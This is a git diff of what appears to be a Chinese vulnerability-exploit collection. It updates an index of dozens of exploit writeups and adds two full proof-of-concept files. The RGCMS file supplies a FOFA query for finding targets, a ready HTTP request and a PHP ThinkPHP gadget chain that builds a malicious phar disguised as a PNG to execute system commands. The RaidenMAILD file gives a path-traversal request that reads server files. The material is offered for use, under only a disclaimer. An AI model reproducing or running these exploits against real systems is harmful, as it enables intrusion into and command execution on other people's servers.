[东华医疗协同办公系统文件上传](./东华医疗协同办公系统/东华医疗协同办公系统文件上传.md) +- [飞企互联-FE企业运营管理平台登录绕过漏洞](./飞企互联/飞企互联-FE企业运营管理平台登录绕过漏洞.md) +- [飞企互联Ognl表达式注入导致RCE](./飞企互联/飞企互联Ognl表达式注入导致RCE.md) +- [西软云XMS反序列化漏洞](./西软云/西软云XMS反序列化漏洞.md) +- [用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞](./用友OA/用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md) +- [用友NC_Cloud_soapFormat.ajax接口存在XXE](./用友OA/用友NC_Cloud_soapFormat.ajax接口存在XXE.md) ## 2023.12.28 新增漏洞 -- wordpress listingo 文件上传漏洞 -- Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467) -- 福建科立讯通信有限公司指挥调度管理平台RCE -- 海康威视-综合安防管理平台-files-文件读取 -- Apache OFBiz SSRF && 任意配置读取 -- Apache Dubbo 反序列化漏洞(CVE-2023-29234) +- [wordpress listingo 文件上传漏洞](./WordPress/wordpress%20listingo%20文件上传漏洞.md) +- [Apache 
OFBiz 身份验证绕过漏洞 (CVE-2023-51467)](./Apache/Apache%20OFBiz%20身份验证绕过漏洞%20(CVE-2023-51467).md) +- [福建科立讯通信有限公司指挥调度管理平台RCE](./福建科立讯通信/福建科立讯通信有限公司指挥调度管理平台RCE.md) +- [海康威视-综合安防管理平台-files-文件读取](./海康威视/海康威视-综合安防管理平台-files-文件读取.md) +- [Apache OFBiz SSRF && 任意配置读取](./Apache/Apache%20OFBiz%20SSRF%20&&%20任意配置读取.md) +- [Apache Dubbo 反序列化漏洞(CVE-2023-29234)](./Apache/Apache%20Dubbo%20反序列化漏洞(CVE-2023-29234).md) ## 2023.12.26 新增漏洞 -- 大华DSS itcBulletin SQL 注入漏洞 -- 湖南建研-检测系统 admintool 任意文件上传 -- OpenSSH ProxyCommand命令注入漏洞 (CVE-2023-51385) -- Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359) -- 金蝶Apusic应用服务器loadTree JNDI注入漏洞 -- 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞 -- Secnet安网 智能AC管理系统 actpt_5g 信息泄露 -- 海康威视安全接入网关任意文件读取漏洞 -- 浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞 -- 海翔ERP SQL注入漏洞 -- 脸爱云 一脸通智慧管理平台任意用户添加漏洞 -- 安恒明御安全网关远程命令执行漏洞 +- [大华DSS itcBulletin SQL 注入漏洞](./大华/大华DSS%20itcBulletin%20SQL%20注入漏洞.md) +- [湖南建研-检测系统 admintool 任意文件上传](./湖南建研检测系统/湖南建研-检测系统%20admintool%20任意文件上传.md) +- [OpenSSH ProxyCommand命令注入漏洞 (CVE-2023-51385)](./OpenSSH/OpenSSH%20ProxyCommand命令注入漏洞%20(CVE-2023-51385).md) +- [Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)](./Salia/Salia%20PLCC%20cPH2%20远程命令执行漏洞(CVE-2023-46359).md) +- [金蝶Apusic应用服务器loadTree JNDI注入漏洞](./金蝶/金蝶Apusic应用服务器loadTree%20JNDI注入漏洞.md) +- [科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞](./科荣AIO/科荣%20AIO任意文件上传-目录遍历-任意文件读取漏洞.md) +- [Secnet安网 智能AC管理系统 actpt_5g 信息泄露](./Secnet安网智能AC管理系统/Secnet安网%20智能AC管理系统%20actpt_5g%20信息泄露.md) +- [海康威视安全接入网关任意文件读取漏洞](./海康威视/海康威视安全接入网关任意文件读取漏洞.md) +- [浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞](./浙江宇视/浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞.md) +- [海翔ERP SQL注入漏洞](./海翔ERP/海翔ERP%20SQL注入漏洞.md) +- [脸爱云 一脸通智慧管理平台任意用户添加漏洞](./脸爱云一脸通智慧管理平台/脸爱云%20一脸通智慧管理平台任意用户添加漏洞.md) +- [安恒明御安全网关远程命令执行漏洞](./安恒/安恒明御安全网关远程命令执行漏洞.md) ## 2023.12.23 新增漏洞 -- avcon综合管理平台SQL注入漏洞 -- 致远互联FE协作办公平台editflow_manager存在sql注入漏洞 -- 海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行 -- 铭飞CMS list接口存在SQL注入 -- 海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893 +- [avcon综合管理平台SQL注入漏洞](./AVCON/avcon综合管理平台SQL注入漏洞.md) +- 
[致远互联FE协作办公平台editflow_manager存在sql注入漏洞](./致远OA/致远互联FE协作办公平台editflow_manager存在sql注入漏洞.md) +- [海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行](./海康威视/海康威视CVE-2023-6895%20IP网络对讲广播系统远程命令执行.md) +- [铭飞CMS list接口存在SQL注入](./铭飞/铭飞CMS%20list接口存在SQL注入.md) +- [海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893](./海康威视/海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893.md) ## 2023.12.17 新增漏洞 -- 大华智能物联综合管理平台justForTest用户登录漏洞 -- CloudPanel RCE漏洞 CVE-2023-35885 -- Smartbi 内置用户登陆绕过 -- 金和OA jc6 clobfield SQL注入漏洞 -- EasyCVR 视频管理平台存在用户信息泄露 -- 用友CRM 任意文件读取漏洞 -- 金蝶星空云K3Cloud反序列化漏洞 +- [大华智能物联综合管理平台justForTest用户登录漏洞](./大华/大华智能物联综合管理平台justForTest用户登录漏洞.md) +- [CloudPanel RCE漏洞 CVE-2023-35885](./CloudPanel/CloudPanel%20RCE漏洞%20CVE-2023-35885.md) +- [Smartbi 内置用户登陆绕过](./Smartbi/Smartbi%20内置用户登陆绕过.md) +- [金和OA jc6 clobfield SQL注入漏洞](./金和OA/金和OA%20jc6%20clobfield%20SQL注入漏洞.md) +- [EasyCVR 视频管理平台存在用户信息泄露](./EasyCVR视频管理平台/EasyCVR%20视频管理平台存在用户信息泄露.md) +- [用友CRM 任意文件读取漏洞](./用友OA/用友CRM%20任意文件读取漏洞.md) +- [金蝶星空云K3Cloud反序列化漏洞](./金蝶/金蝶星空云K3Cloud反序列化漏洞.md) ## 2023.12.15 新增漏洞 -- 万户ezoffice wpsservlet任意文件上传漏洞 -- 万户 ezOFFICE DocumentEdit.jsp SQL注入 -- 用友 NC uapws wsdl XXE漏洞 -- iDocView upload接口任意文件读取 -- Wordpress Backup Migration plugin 代码执行漏洞(CVE-2023-6553) +- [万户ezoffice wpsservlet任意文件上传漏洞](./万户OA/万户ezoffice%20wpsservlet任意文件上传漏洞.md) +- [万户 ezOFFICE DocumentEdit.jsp SQL注入](./万户OA/万户%20ezOFFICE%20DocumentEdit.jsp%20SQL注入.md) +- [用友 NC uapws wsdl XXE漏洞](./用友OA/用友%20NC%20uapws%20wsdl%20XXE漏洞.md) +- [iDocView upload接口任意文件读取](./iDocView/iDocView%20upload接口任意文件读取.md) +- [Wordpress Backup Migration plugin 代码执行漏洞(CVE-2023-6553)](./WordPress/Wordpress%20Backup%20Migration%20plugin%20代码执行漏洞(CVE-2023-6553).md) ## 2023.12.14 新增漏洞 -- 泛微云桥 e-Bridge addTaste接口SQL注入漏洞 -- Tenda路由器账号密码泄露 -- 思福迪运维安全管理系统RCE漏洞 +- [泛微云桥 e-Bridge addTaste接口SQL注入漏洞](./泛微OA/泛微云桥%20e-Bridge%20addTaste接口SQL注入漏洞.md) +- [Tenda路由器账号密码泄露](./Tenda/Tenda路由器账号密码泄露.md) +- [思福迪运维安全管理系统RCE漏洞](./思福迪运维安全管理系统/思福迪运维安全管理系统RCE漏洞.md) ## 2023.12.11 新增漏洞 -- Apache Struts2 CVE-2023-50164 -- 蓝凌EKP前台授权绕过导致文件上传 
-- 通达OA header身份认证绕过漏洞 +- [Apache Struts2 CVE-2023-50164](./Apache/Apache%20Struts2%20CVE-2023-50164.md) +- [蓝凌EKP前台授权绕过导致文件上传](./蓝凌OA/蓝凌EKP前台授权绕过导致文件上传.md) +- [通达OA header身份认证绕过漏洞](./通达OA/通达OA%20header身份认证绕过漏洞.md) ## 2023.12.08 新增漏洞 -- Dedecms v5.7.111前台tags.php SQL注入漏洞 -- 云时空社会化商业ERP任意文件上传 -- 奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞 +- [Dedecms v5.7.111前台tags.php SQL注入漏洞](./dede/Dedecms%20v5.7.111前台tags.php%20SQL注入漏洞.md) +- [云时空社会化商业ERP任意文件上传](./云时空/云时空社会化商业ERP任意文件上传.md) +- [奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞](./奥威亚视频云平台/奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞.md) ## 2023.12.07 新增漏洞 -- WeiPHP存在SQL注入漏洞 -- Apache Ofbiz XML-RPC RCE漏洞-CVE-2023-49070 -- 多个防火墙产品RCE -- 金蝶Apusic应用服务器任意文件上传 +- [WeiPHP存在SQL注入漏洞](./WeiPHP/WeiPHP存在SQL注入漏洞.md) +- [Apache Ofbiz XML-RPC RCE漏洞-CVE-2023-49070](./Apache/Apache%20Ofbiz%20XML-RPC%20RCE漏洞-CVE-2023-49070.md) +- [多个防火墙产品RCE](./防火墙产品/多个防火墙产品RCE.md) +- [金蝶Apusic应用服务器任意文件上传](./金蝶/金蝶Apusic应用服务器任意文件上传.md) ## 2023.12.05 新增漏洞 -- 速达软件全系产品存在任意文件上传漏洞 -- 易思智能物流无人值守系统5.0存在任意文件上传漏洞 -- RuoYi4.6.0 SQL注入漏洞CVE-2023-49371 +- [速达软件全系产品存在任意文件上传漏洞](./速达软件/速达软件全系产品存在任意文件上传漏洞.md) +- [易思智能物流无人值守系统5.0存在任意文件上传漏洞](./易思智能物流无人值守系统/易思智能物流无人值守系统5.0存在任意文件上传漏洞.md) +- [RuoYi4.6.0 SQL注入漏洞CVE-2023-49371](./RuoYi/RuoYi4.6.0%20SQL注入漏洞CVE-2023-49371.md) ## 2023.12.03 新增漏洞 -- 智跃人力资源管理系统GenerateEntityFromTable.aspx SQL漏洞 +- [智跃人力资源管理系统GenerateEntityFromTable.aspx SQL漏洞](./智跃人力资源管理系统/智跃人力资源管理系统GenerateEntityFromTable.aspx%20SQL漏洞.md) ## 2023.11.30 新增漏洞 -- Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678 -- 红帆OA iorepsavexml.aspx 文件上传漏洞 +- [Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678](./Apache/Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678.md) +- [红帆OA iorepsavexml.aspx 文件上传漏洞](./红帆OA/红帆OA%20iorepsavexml.aspx%20文件上传漏洞.md) ## 2023.11.29 新增漏洞 -- 网神防火墙 app_av_import_save文件上传漏洞 -- 大华智慧园区管理平台任意文件读取 -- 通达OA down.php接口存在未授权访问漏洞 +- [网神防火墙 app_av_import_save文件上传漏洞](./网神/网神防火墙%20app_av_import_save文件上传漏洞.md) +- [大华智慧园区管理平台任意文件读取](./大华/大华智慧园区管理平台任意文件读取.md) +- [通达OA 
down.php接口存在未授权访问漏洞](./通达OA/通达OA%20down.php接口存在未授权访问漏洞.md) ## 2023.11.28 新增漏洞 -- 新开普掌上校园服务管理平台service.action远程命令执行 -- 易宝OA ExecuteSqlForSingle SQL注入漏洞 -- 大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞 -- 云匣子堡垒机fastjson漏洞 -- 海康威视运行管理中心fastjson漏洞 -- Array VPN任意文件读取漏洞 -- 万户OA-upload任意文件上传漏洞 +- [新开普掌上校园服务管理平台service.action远程命令执行](./新开普掌上校园服务管理平台/新开普掌上校园服务管理平台service.action远程命令执行.md) +- [易宝OA ExecuteSqlForSingle SQL注入漏洞](./易宝OA/易宝OA%20ExecuteSqlForSingle%20SQL注入漏洞.md) +- [大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞](./大华/大华智慧园区综合管理平台%20deleteFtp%20远程命令执行漏洞.md) +- [云匣子堡垒机fastjson漏洞](./云匣子堡垒机/云匣子堡垒机fastjson漏洞.md) +- [海康威视运行管理中心fastjson漏洞](./海康威视/海康威视运行管理中心fastjson漏洞.md) +- [Array VPN任意文件读取漏洞](./Array%20VPN/Array%20VPN任意文件读取漏洞.md) +- [万户OA-upload任意文件上传漏洞](./万户OA/万户OA-upload任意文件上传漏洞.md) ## 2023.11.26 新增漏洞 -- 用友NC word.docx任意文件读取漏洞 -- 用友NC的download文件存在任意文件读取漏洞 -- 泛微e-cology9_SQL注入-CNVD-2023-12632 -- TOTOLINK A3700R命令执行漏洞CVE-2023-46574 -- Splunk-Enterprise远程代码执行漏洞(CVE-2023-46214) +- [用友NC word.docx任意文件读取漏洞](./用友OA/用友NC%20word.docx任意文件读取漏洞.md) +- [用友NC的download文件存在任意文件读取漏洞](./用友OA/用友NC的download文件存在任意文件读取漏洞.md) +- [泛微e-cology9_SQL注入-CNVD-2023-12632](./泛微OA/泛微e-cology9_SQL注入-CNVD-2023-12632.md) +- [TOTOLINK A3700R命令执行漏洞CVE-2023-46574](./路由器/TOTOLINK%20A3700R命令执行漏洞CVE-2023-46574.md) +- [Splunk-Enterprise远程代码执行漏洞(CVE-2023-46214)](./Splunk%20Enterprise/Splunk-Enterprise远程代码执行漏洞(CVE-2023-46214).md) ## 2023.11.24 新增漏洞 -- 华为Auth-Http Serve任意文件读取 -- 昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071) -- 好视通视频会议系统 toDownload.do接口 任意文件读取漏洞 +- [华为Auth-Http Serve任意文件读取](./华为Auth-Http%20Serve/华为Auth-Http%20Serve任意文件读取.md) +- [昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071)](./昂捷ERP/昂捷ERP%20WebService接口%20SQL注入漏洞(QVD-2023-45071).md) +- [好视通视频会议系统 toDownload.do接口 任意文件读取漏洞](./好视通视频会议系统/好视通视频会议系统%20toDownload.do接口%20任意文件读取漏洞.md) ## 2023.11.23 新增漏洞 -- 大华智能物联ICC综合管理平台readpic任意文件读取漏洞 -- Apache-Submarine-SQL注入漏洞CVE-2023-37924 -- H3C网络管理系统任意文件读取漏洞 -- 广州图创图书馆集群管理系统存在未授权访问 -- I Doc View任意文件上传漏洞 -- 致远OA M3 Server 反序列化漏洞 -- pyLoad远程代码执行漏洞 +- 
[大华智能物联ICC综合管理平台readpic任意文件读取漏洞](./大华/大华智能物联ICC综合管理平台readpic任意文件读取漏洞.md) +- [Apache-Submarine-SQL注入漏洞CVE-2023-37924](./Apache/Apache-Submarine-SQL注入漏洞CVE-2023-37924.md) +- [H3C网络管理系统任意文件读取漏洞](./H3C/H3C网络管理系统任意文件读取漏洞.md) +- [广州图创图书馆集群管理系统存在未授权访问](./广州图创图书馆集群管理系统/广州图创图书馆集群管理系统存在未授权访问.md) +- [I Doc View任意文件上传漏洞](./iDocView/I%20Doc%20View任意文件上传漏洞.md) +- [致远OA M3 Server 反序列化漏洞](./致远OA/致远OA%20M3%20Server%20反序列化漏洞.md) +- [pyLoad远程代码执行漏洞](./pyLoad/pyLoad远程代码执行漏洞.md) ## 2023.11.20 新增漏洞 -- 金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞 -- 浙大恩特客户资源管理系统 文件上传和sql注入漏洞 -- 锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露 -- Appium Desktop CVE-2023-2479漏洞 +- [金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞](./金蝶/金蝶OA-EAS系统%20uploadLogo.action%20任意文件上传漏洞.md) +- [浙大恩特客户资源管理系统 文件上传和sql注入漏洞](./浙大恩特客户资源管理系统/浙大恩特客户资源管理系统%20文件上传和sql注入漏洞.md) +- [锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露](./锐捷/锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露.md) +- [Appium Desktop CVE-2023-2479漏洞](./Appium%20Desktop/Appium%20Desktop%20CVE-2023-2479漏洞.md) ## 2023.11.19 新增漏洞 -- 用友U8-cloud RegisterServlet接口存在SQL注入漏洞 -- SysAid远程命令执行漏洞(CVE-2023-47246) -- CVE-2023-4357-Chrome-XXE漏洞 +- [用友U8-cloud RegisterServlet接口存在SQL注入漏洞](./用友OA/用友U8-cloud%20RegisterServlet接口存在SQL注入漏洞.md) +- [SysAid远程命令执行漏洞(CVE-2023-47246)](./SysAid/SysAid远程命令执行漏洞(CVE-2023-47246).md) +- [CVE-2023-4357-Chrome-XXE漏洞](./Chrome/CVE-2023-4357-Chrome-XXE漏洞.md) ## 2023.11.17 新增漏洞 -- 金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞 +- [金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞](./金蝶/金蝶OA云星空%20ScpSupRegHandler%20任意文件上传漏洞.md) ## 2023.11.16 新增漏洞 -- 迪普DPTech VPN 任意文件读取 -- 蓝凌OAsysUiComponent 文件存在任意文件上传漏洞 -- 通达OA get_datas.php前台sql注入 +- [迪普DPTech VPN 任意文件读取](./迪普/迪普DPTech%20VPN%20任意文件读取.md) +- [蓝凌OAsysUiComponent 文件存在任意文件上传漏洞](./蓝凌OA/蓝凌OAsysUiComponent%20文件存在任意文件上传漏洞.md) +- [通达OA get_datas.php前台sql注入](./通达OA/通达OA%20get_datas.php前台sql注入.md) ## 2023.11.09 新增漏洞 -- IP-guard WebServer 远程命令执行漏洞 +- [IP-guard WebServer 远程命令执行漏洞](./IP%20guard%20WebServer/IP-guard%20WebServer%20远程命令执行漏洞.md) ## 2023.11.08 新增漏洞 -- 奇安信360天擎getsimilarlistSQL注入漏洞 -- 致远M1 
usertokenservice 反序列化RCE漏洞 +- [奇安信360天擎getsimilarlistSQL注入漏洞](./天擎/奇安信360天擎getsimilarlistSQL注入漏洞.md) +- [致远M1 usertokenservice 反序列化RCE漏洞](./致远OA/致远M1%20usertokenservice%20反序列化RCE漏洞.md) ## 2023.11.07 新增漏洞 -- jshERP信息泄露漏洞 -- 致远OA wpsAssistServlet任意文件读取漏洞 -- 金和OA任意文件读取漏洞 +- [jshERP信息泄露漏洞](./jshERP/jshERP信息泄露漏洞.md) +- [致远OA wpsAssistServlet任意文件读取漏洞](./致远OA/致远OA%20wpsAssistServlet任意文件读取漏洞.md) +- [金和OA任意文件读取漏洞](./金和OA/金和OA任意文件读取漏洞.md) ## 2023.11.03 新增漏洞 -- XXL-JOB默认accessToken身份绕过漏洞 -- Confluence身份认证绕过(CVE-2023-22518) +- [XXL-JOB默认accessToken身份绕过漏洞](./XXL-JOB/XXL-JOB默认accessToken身份绕过漏洞.md) +- [Confluence身份认证绕过(CVE-2023-22518)](./Confluence/Confluence身份认证绕过(CVE-2023-22518).md) ## 2023.10.31 新增漏洞 -- F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747) -- Cisco IOS XE CVE-2023-20198权限提升漏洞 +- [F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)](./F5-BIG-IP/F5%20BIG-IP%20远程代码执行漏洞(CVE-2023-46747).md) +- [Cisco IOS XE CVE-2023-20198权限提升漏洞](./Cisco/Cisco%20IOS%20XE%20CVE-2023-20198权限提升漏洞.md) ## 2023.10.30 新增漏洞 -- JAVA Public CMS 后台RCE漏洞 +- [JAVA Public CMS 后台RCE漏洞](./Public%20CMS/JAVA%20Public%20CMS%20后台RCE漏洞.md) ## 2023.10.26 新增漏洞 -- Apache ActiveMQ远程命令执行漏洞 +- [Apache ActiveMQ远程命令执行漏洞](./Apache/Apache%20ActiveMQ远程命令执行漏洞.md) ## 2023.10.25 新增漏洞 -- 用友U8-Cloud upload任意文件上传漏洞 -- [安美数字酒店宽带运营系统SQL注入漏洞](安美数字酒店宽带运营系统SQL注入漏洞.md) -- [泛微E-MobileServer远程命令执行漏洞](泛微E-MobileServer远程命令执行漏洞.md) -- 蓝凌OA treexml.tmpl 远程命令执行漏洞 +- [用友U8-Cloud upload任意文件上传漏洞](./用友OA/用友U8-Cloud%20upload任意文件上传漏洞.md) +- [安美数字酒店宽带运营系统SQL注入漏洞](安美数字酒店宽带运营系统/安美数字酒店宽带运营系统SQL注入漏洞.md) +- [泛微E-MobileServer远程命令执行漏洞](./泛微OA/泛微E-MobileServer远程命令执行漏洞.md) +- [蓝凌OA treexml.tmpl 远程命令执行漏洞](./蓝凌OA/蓝凌OA%20treexml.tmpl%20远程命令执行漏洞.md) ## 2023.10.21 新增漏洞 -- [海康威视综合安防管理平台信息泄露](海康威视综合安防管理平台信息泄露.md) +- [海康威视综合安防管理平台信息泄露](./海康威视/海康威视综合安防管理平台信息泄露.md) ## 2023.10.20 新增漏洞 -- [蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞](蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞.md) -- 用友NC-Cloud uploadChunk 任意文件上传漏洞 -- 深信服下一代防火墙NGAF RCE漏洞 -- 金蝶EAS myUploadFile任意文件上传 -- 用友 GRP U8 license_check.jsp 存在SQL注入 +- 
[蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞](./蓝凌OA/蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞.md) +- [用友NC-Cloud uploadChunk 任意文件上传漏洞](./用友OA/用友NC-Cloud%20uploadChunk%20任意文件上传漏洞.md) +- [ 深信服下一代防火墙NGAF RCE漏洞](./深信服/深信服下一代防火墙NGAF%20RCE漏洞.md) +- [ 金蝶EAS myUploadFile任意文件上传](./金蝶/金蝶EAS%20myUploadFile任意文件上传.md) +- [ 用友 GRP U8 license_check.jsp 存在SQL注入](./用友OA/用友%20GRP%20U8%20license_check.jsp%20存在SQL注入.md) ## 2023.10.18 新增漏洞 -- 360天擎 - 未授权与sql注入 -- 深信服SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE -- 深信服下一代防火墙NGAF任意文件读取漏洞 -- Confluence 未授权提权访问漏洞 -- 泛微e-office 未授权访问 -- 金山终端安全系统V9.0 SQL注入漏洞 +- [360天擎 - 未授权与sql注入](./天擎/360天擎%20-%20未授权与sql注入.md) +- [深信服SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE](./深信服/深信服SANGFOR终端检测响应平台%20-%20任意用户免密登录,前台RCE.md) +- [深信服下一代防火墙NGAF任意文件读取漏洞](./深信服/深信服下一代防火墙NGAF任意文件读取漏洞.md) +- [Confluence 未授权提权访问漏洞](./Confluence/Confluence%20未授权提权访问漏洞.md) +- [泛微e-office 未授权访问](./泛微OA/泛微e-office%20未授权访问.md) +- [金山终端安全系统V9.0 SQL注入漏洞](./金山/金山终端安全系统V9.0%20SQL注入漏洞.md) ## 2023.9.26 新增漏洞 -- JumpServer未授权访问漏洞 CVE-2023-42442 -- Craft CMS远程代码执行漏洞 CVE-2023-41892 -- WinRAR CVE-2023-38831 漏洞 -- 用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞 +- [JumpServer未授权访问漏洞 CVE-2023-42442](./JumpServer/JumpServer未授权漏洞.md) +- [Craft CMS远程代码执行漏洞 CVE-2023-41892](./Craft/Craft%20CMS远程代码执行漏洞CVE-2023-41892.md) +- [WinRAR CVE-2023-38831 漏洞](./WinRAR/WinRAR%20CVE-2023-38831.md) +- [用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞](./用友OA/用友%20GRP-U8%20bx_historyDataCheck.jsp%20SQL注入漏洞.md) ## 2023.9.22 新增漏洞 -- Joomla 未授权漏洞CVE-2023-23752 +- [Joomla 未授权漏洞CVE-2023-23752](./Joomla/Joomla%20未授权漏洞CVE-2023-23752.md) ## 2023.9.19 新增漏洞 -- smanga存在未授权远程代码执行漏洞 CVE-2023-36076 -- JFinalCMS 任意文件读取漏洞(CVE-2023-41599) +- [smanga存在未授权远程代码执行漏洞 CVE-2023-36076](./smanga/smanga存在未授权远程代码执行漏洞.md) +- [JFinalCMS 任意文件读取漏洞(CVE-2023-41599)](./JFinalCMS/JFinalCMS%20任意文件读取漏洞(CVE-2023-41599).md) ## 2023.9.14 新增漏洞 -- 致远OA前台用户重置密码漏洞 -- Apache Spark命令执行漏洞(CVE-2023-32007) +- [致远OA前台用户重置密码漏洞](./致远OA/致远前台任意用户密码修改.md) +- [Apache 
Spark命令执行漏洞(CVE-2023-32007)](./Apache/Apache%20Spark命令执行漏洞(CVE-2023-32007).md) ## 免责声明 由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。 diff --git a/RGCMS2.0存在phar反序列化漏洞.md b/RGCMS2.0存在phar反序列化漏洞.md new file mode 100644 index 0000000..0305dd1 --- /dev/null +++ b/RGCMS2.0存在phar反序列化漏洞.md 
@@ -0,0 +1,133 @@ +# RGCMS2.0存在phar反序列化漏洞 + +**RGCMS存在反序列化漏洞,攻击者可以通过该漏洞执行任意命令。** + +## fofa + +```javascript +"RGCMS" +``` + +## poc + +```javascript +POST /admin.php/data/delbackup HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 212 +Origin: http://rgcms:81 +Connection: close +Referer: http://rgcms:81/admin.php/data/backuplist +Cookie: PHPSESSID=us9vfbgeh2i9c5kcp7h27ii8ns +Priority: u=0 + +title=20240820110529_rgcms.db&path=phar://upload/image/20240820/2057e04b4b2d528ed7726d233fc87191.png&children=&mtime=2024-08-20+11%3A05%3A29&size=1.09MB&type=file&ext=db&isReadable=true&isWritable=true&edit=false +``` + +**漏洞复现** + +生成phar文件 + +```php +<?php +namespace think\process\pipes { +    class Windows +    { +        private $files; +        public function __construct($files) +        { +            $this->files = array($files); +        } +    } +} + +namespace think\model\concern { +    trait Conversion +    { +        protected $append = array("smi1e" => "1"); +    } + +    trait Attribute +    { +        private $data; +        private $withAttr = array("smi1e" => "system"); + +        public function get() +        { +            $this->data = array("smi1e" => "calc"); +        } +    } +} +namespace think { +    abstract class Model +    { +        use model\concern\Attribute; +        use model\concern\Conversion; +    } +} + +namespace think\model{ +    use think\Model; +    class Pivot extends Model +    { +        public function __construct() +        { +            $this->get(); +        } +    } +} + +namespace { + +    $conver = newthink\model\Pivot(); +    $a = new think\process\pipes\Windows($conver); + + +  
  $phar = new Phar('hkey.phar'); +    $phar -> stopBuffering(); +    $phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>'); +    $phar -> addFromString('test.txt','test'); +    $phar -> setMetadata($a); +    $phar -> stopBuffering(); +} +?> +``` + +**把hkey.phar文件名修改为hkey.png** + +**安装时RGCMS时选择数据库类型为:Sqlite** + +![4e0412e97319c4cab7d8676d59484750](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061633854.jpg) + + + +**上传恶意的png文件:** + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061633107.jpeg) + +来到备份修复功能 + +![9427ecd99f1abb35cff8de1089d5211b](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061633615.png) + +![89c3630e24a51314c2328e9d0bfcecf6](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061634669.jpg) + +![90be81b23edef08235fbdec978300ad1](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061634102.png) + +**将数据包中path参数修改为** + +**phar://upload/image/20240820/2057e04b4b2d528ed7726d233fc87191.png** + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061634602.png) + + + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/WxffySGN33r-7ZJtD40BKA \ No newline at end of file diff --git a/RaidenMAILD邮件服务器v.4.9.4存在任意文件读取漏洞.md b/RaidenMAILD邮件服务器v.4.9.4存在任意文件读取漏洞.md new file mode 100644 index 0000000..7d55c29 --- /dev/null +++ b/RaidenMAILD邮件服务器v.4.9.4存在任意文件读取漏洞.md 
@@ -0,0 +1,28 @@ +# RaidenMAILD邮件服务器v.4.9.4存在任意文件读取漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);"> </font>RaidenMAILD是一款稳定、安全、高性能的邮件服务器软件,适用于中小型企业、机构以及个人用户搭建自己的邮件系统。该产品 Raden MAILD Mail Server v.4.9.4及以前版本中存在任意文件读取漏洞,允许远程攻击者通过/webeditor/组件获取敏感信息。 + +# 二、影响版本 ++ RaidenMAILD<4.9.4 + +# 三、资产测绘 ++ fofa`RaidenMAILD Mail Server <= 4.9.4` ++ 特征 + +![1714229722832-98ad3c87-4222-411f-87e2-5895a002cdd9.png](./img/cToKgwcRMUfI6HSw/1714229722832-98ad3c87-4222-411f-87e2-5895a002cdd9-041666.png) + +# 四、漏洞复现 +```plain +GET /webeditor/../../../windows/win.ini HTTP/1.1 +Host: +Cache-Control: max-age=0 +Connection: close +``` + +![1714229752407-c112d773-a048-4c35-afd1-0c96c3a4f6fe.png](./img/cToKgwcRMUfI6HSw/1714229752407-c112d773-a048-4c35-afd1-0c96c3a4f6fe-619548.png) + + + +> 更新: 2024-04-28 16:17:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gyn1em2xgen6fhmc> \ No newline at end of file diff --git a/Redis-manager存在SpringBoot未授权漏洞.md b/Redis-manager存在SpringBoot未授权漏洞.md new file mode 100644 index 